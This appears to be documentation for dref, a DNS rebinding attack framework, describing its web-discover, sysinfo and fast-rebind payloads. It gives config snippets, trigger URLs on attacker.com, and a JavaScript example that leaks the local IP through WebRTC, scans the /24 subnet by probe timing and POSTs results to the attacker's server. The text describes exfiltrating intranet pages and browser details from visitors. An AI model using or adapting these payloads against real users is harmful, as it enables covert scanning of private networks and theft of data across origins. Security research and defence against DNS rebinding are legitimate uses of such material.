Payloads
The web-discover payload fetches the browser's local IP address using WebRTC and derives a /24 subnet from it. It then uses netmap.js to scan that subnet for live web services on ports 80 and 8080.

When the scan is complete it opens a rebind iframe for each web service found, configures the DNS records to point at the local service, and fetches the service's index page. It POSTs the HTML responses back to dref, exfiltrating data across origins.

The payload takes several minutes to run to completion.
dref/scripts/src/payloads/web-discover.js
To configure the payload, edit dref-config.yml:

targets:
  - target: "demo"
    script: "web-discover"
The payload can be triggered by visiting http://demo.attacker.com/.
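The following is an added example written for this page; it is not code from dref or netmap.js. It walks through the first stages of the web-discover payload in plain JavaScript: pulling an IPv4 address out of a WebRTC ICE candidate string, checking that it is an RFC 1918 address, deriving the /24 it sits in, enumerating host:port targets on ports 80 and 8080, and classifying the timing of a probe. The timing thresholds, the img-based probe and the /results POST path are assumptions made for the example, not dref behaviour. One caveat worth knowing: current Chrome and Safari builds replace the address in host ICE candidates with an mDNS name (a uuid.local hostname), so the WebRTC leak the payload relies on often yields no IP at all; the extractor below returns null in that case.

```javascript
// Added example, not code from dref or netmap.js. Reproduces the early stages of
// the web-discover payload: WebRTC candidate -> local IPv4 -> /24 -> probe targets
// -> timing classification. Thresholds and the probe heuristic are assumptions.

const PROBE_PORTS = [80, 8080]; // the ports web-discover scans

// Host ICE candidates look like:
//   "candidate:1 1 udp 2122260223 192.168.1.37 54321 typ host generation 0"
// Browsers that obfuscate host candidates emit a uuid.local mDNS name instead,
// so no IPv4 literal is present and we return null.
function extractIPv4FromCandidate(candidate) {
  const m = /(?:\d{1,3}\.){3}\d{1,3}/.exec(candidate);
  return m ? m[0] : null;
}

function parseIPv4(ip) {
  const octets = ip.split(".").map(Number);
  if (octets.length !== 4 || octets.some((o) => !Number.isInteger(o) || o < 0 || o > 255)) {
    throw new Error(`invalid IPv4 address: ${ip}`);
  }
  return octets;
}

// RFC 1918 check: only bother scanning if the leaked address is on a private network.
function isPrivateIPv4(ip) {
  const [a, b] = parseIPv4(ip);
  return a === 10 || (a === 172 && b >= 16 && b <= 31) || (a === 192 && b === 168);
}

// Derive the /24 containing `ip` and list its 254 usable hosts (.1 to .254).
function deriveSlash24(ip) {
  const [a, b, c] = parseIPv4(ip);
  const prefix = `${a}.${b}.${c}`;
  const hosts = [];
  for (let d = 1; d <= 254; d++) hosts.push(`${prefix}.${d}`);
  return { network: `${prefix}.0/24`, hosts };
}

// Cross product of hosts and ports, as URLs the browser could probe.
function buildTargets(hosts, ports = PROBE_PORTS) {
  const targets = [];
  for (const host of hosts) for (const port of ports) targets.push(`http://${host}:${port}/`);
  return targets;
}

// Assumed timing heuristic, in the spirit of browser-based network scanners:
// a closed port fails almost instantly (TCP RST), an open web port makes the browser
// wait for an HTTP response before firing load/error, and a silent host times out.
const CLOSED_MAX_MS = 40;
function classifyProbe({ elapsedMs, timedOut }) {
  if (timedOut) return "unreachable";
  return elapsedMs < CLOSED_MAX_MS ? "closed" : "open";
}

// Browser-only: time one cross-origin probe using an <img> element.
function probeTarget(url, timeoutMs = 5000) {
  return new Promise((resolve) => {
    const start = performance.now();
    const img = new Image();
    let done = false;
    const finish = (timedOut) => {
      if (done) return;
      done = true;
      resolve(classifyProbe({ elapsedMs: performance.now() - start, timedOut }));
    };
    img.onload = img.onerror = () => finish(false);
    setTimeout(() => finish(true), timeoutMs);
    img.src = url;
  });
}

// Browser-only: ship results back to the attacker's server, mirroring the payload's
// POST of fetched pages. "/results" is an assumed path, not a dref endpoint.
function postResults(drefOrigin, results) {
  return fetch(`${drefOrigin}/results`, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify(results),
  });
}

// Demo on a constructed candidate line; runs offline with no network access.
const demoCandidate = "candidate:1 1 udp 2122260223 192.168.1.37 54321 typ host generation 0";
const leaked = extractIPv4FromCandidate(demoCandidate);
if (leaked && isPrivateIPv4(leaked)) {
  const { network, hosts } = deriveSlash24(leaked);
  console.log(`${network}: ${buildTargets(hosts).length} targets to probe`);
}
```

In a browser the scan itself would be `Promise.all(buildTargets(hosts).map(probeTarget))`, keeping only targets classified as open before opening rebind iframes for them; in Node only the pure helpers run, which is what the demo exercises.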
The sysinfo payload does not use DNS rebinding. It simply exfiltrates information about the browser that may be of use to an attacker, such as version information and configuration.
dref/scripts/src/payloads/sysinfo.js
To configure the payload, edit dref-config.yml:

targets:
  - target: "sysinfo"
    script: "sysinfo"
The payload can be triggered by visiting http://sysinfo.attacker.com/.
The fast-rebind payload showcases the fastRebind configuration key, which enables near-instant DNS rebinding. This does not work every time and is inconsistent between browsers and operating systems; at present it works about 50% of the time on Chrome on macOS (this can and will be improved to 100%).

The advantage of fastRebind is that victims need only stay on the website for a couple of seconds for the full attack to run, instead of the 60 seconds required by the universal, stable DNS rebinding attack.
dref/scripts/src/payloads/fast-rebind.js
To configure the payload, edit dref-config.yml:

targets:
  - target: "fast-rebind"
    script: "fast-rebind"
    fastRebind: true
    args:
      host: "192.168.1.1"
      port: 80
      path: "/index.html"
The payload can be triggered by visiting http://fast-rebind.attacker.com/.